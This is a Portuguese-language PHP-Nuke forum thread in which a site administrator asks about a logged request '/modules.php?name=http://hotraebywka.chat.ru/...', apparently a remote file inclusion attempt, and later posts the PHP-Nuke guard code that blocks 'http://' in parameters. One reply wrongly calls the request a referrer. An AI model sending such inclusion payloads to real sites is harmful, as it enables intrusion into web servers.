Busca

Mandrake1 · Novato Registrado em: Mar 22, 2004 Mensagens: 11

Estava fazendo uma vistoria no meu portal e tive a idéia de usar palavras pornográficas no meu backup, achei na tabela "_nsnst_tracked_ips" do sentinel a seguinte linha
`nome_nsnst_tracked_ips` VALUES (269895, '86.139.124.69', 'host86-139-124-69.range86-139.btcentralplus.com', 1, '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)', 1196712158, '/modules.php?name=http://hotraebywka.chat.ru/images/girl?', 'none', 'none', '86.139.124.69', '36602', 'GET', '00');

Alguem pode me dizer o que significa o /modules.php?name=http://hotraebywka.chat.ru/images/girl?

o que esse cara está tentando fazer no meu portal? será que tem um script rodando em algum arquivo.

Olhei na pasta modules e não existe nada estranho que justifique o uso do comando http

O pior é que funciona.

Se alguem tiver alguma idéia me avise urgentemente.

Denis

jozephh · Enviada: Qui Dez 27, 2007 1:10 pm Assunto: Ajuda

Nao sei extamente o que vc quer, porem este link ai provavelmente e da pagina que alguem tava antes de entrar em seu portal, normalmente o link anterior e gravado pra gente saber de onde veio o usuario.
_________________
SO ME ADICIONE NO MSN SE FOR PARA TRABALHO, AJUDO APENAS AKI PELO FORUM.
jozephh@msn.com

Mandrake1 · Novato Registrado em: Mar 22, 2004 Mensagens: 11

Na verdade acho que economizei um pouco nas palavras. No Sentinel na opção 'Tracked IP Menu' e posteriormente em 'Display Tracked IP's' vc terá a vida do usuário no seu portal. saberá o ip e onde navegou no seu portal. Neste local achei um ip estranho, juntamente com alguns outros que pude percebe estavam, no histórico, apresentando www.nomedoportal.com.br/modules.php?name=http://hotraebywka.chat.ru/images/girl?
me chamou a atenção a palavra girl. Percebi que aqui era a ação do visitante e não de onde ele veio.

Fui testar o endereço que apareceu escrito "Hi and Bye". Não encontrei nenhuma página dentro do meu portal escrito isso. Fui então testar se funcionava. Quando coloco qualquer outra coisa depois do termo ...name= o portal coloca como "Desculpe-nos, mas este arquivo não foi encontrado." Então fui tentar fazer o teste no site do comunidade e no exato momento fui redirecionado para o site da polícia federal e meu ip foi bloqueado.

A minha dúvida é: Qual o estrago este cara pode ter causado no meu portal? E como fazer com que o meu portal tb apresente este tipo de segurança que é utilizado aqui na comunidade? Por acaso é um Sentinel mais novo, etc?

Espero ter me expressado melhor agora e fica aqui o aviso para quem tb utiliza um nuke 7.5 kayapó.

Mandrake1 · Novato Registrado em: Mar 22, 2004 Mensagens: 11

Pessoal queria deixar o meu comunicado. Andei olhando mais no nuke e encontrei nos códigos o seguinte:

if(eregi("http\:\/\/", $name)) { die("Hi and Bye"); }
if(eregi("http\:\/\/", $file)) { die("Hi and Bye"); }

acredito ser uma proteção do nuke para o uso indevido do código. Fiquei mais tranquilo. Para aqueles que são programadores como substituir o código para ao invés de escrever enviar o cara para um outro site e bloquear o ip dele.

Valeu!

Mandrake

claudio_luciano · Enviada: Qua Jul 16, 2008 11:31 pm Assunto:

Engraçado, pq esse redirecionamento para a PF?? Não entendi. É feito alguma denúncia de tentativa de invasão aqui na CNB?
_________________
Cláudio Luciano
Webmaster e Administrador do Portal Garanhuns Espírita
www.garanhunsespirita.com.br
www.garanhunsespirita.com.br/ceeman

rjdias · Enviada: Qui Jul 17, 2008 7:48 pm Assunto:

	Comunidade PHP-Nuke Brasil - Índice do Fórum -> Segurança no PHP-Nuke	Todos os horários são GMT - 3 Hours
Página 1 de 1